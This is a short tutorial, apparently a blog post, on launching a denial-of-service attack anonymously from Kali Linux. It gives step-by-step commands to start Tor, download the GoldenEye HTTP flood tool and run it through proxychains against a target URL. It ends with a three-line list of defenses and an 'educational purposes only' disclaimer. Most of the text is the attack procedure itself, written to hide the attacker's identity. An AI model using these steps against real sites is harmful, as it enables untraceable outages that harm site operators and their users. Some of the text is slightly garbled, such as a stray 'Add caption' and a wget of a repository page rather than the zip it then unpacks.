DDOS a website anonymously by using kali linux


  • DDOS tools are capable of putting heavy loads on HTTP servers and bring them to their knees by exhausting it’s resources.
Add caption

DDOS tools are capable of putting heavy loads on HTTP servers and bring them to their knees by exhausting it’s resources.




What is a DDOS attack?

This tutorials was created for educational purposes only. We believe that Ethical hacking, Information security and Cyber security skills should be required for anyone in this Digital World.

Required tools

EtherApe – A a graphical network monitor, which displays network activity graphically. Hosts and links change in size with traffic. Color coded protocols display.Service Tor – Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc., without revealing your IP address to its users.Proxychains –  Latest version of Proxychains support SOCKS5, SOCKS4, and HTTP CONNECTproxy servers. Proxychains can be mixed up with a different proxy types.GoldenEye – GoldenEye an python app designed for Security Testing Purpose only.

How to attack ?



Step1 : Run etherape root@kali:~# etherape, it prompts a popup window which displays network activity graphically.
Step2 : Run TOR Service now root@kali:~# service tor start
Step3 : Download Goldeneye https://github.com/jseidl/GoldenEye                      root@kali:~# wget https://github.com/jseidl/GoldenEye
Step4 : Once Downloaded Unzip it as a folder root@kali:~# unzip GoldenEye-master.zip
Step5 : Launch the attack
root@kali:~/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com

If you encounter any problems or other compatibility issues, please feel free to comment.

Common Defenses against DDOS attack

  • Decrease Per IP connection rate.
  • Use IDS, Web-application firewalls.
  • Tweak Connection per IP threshold.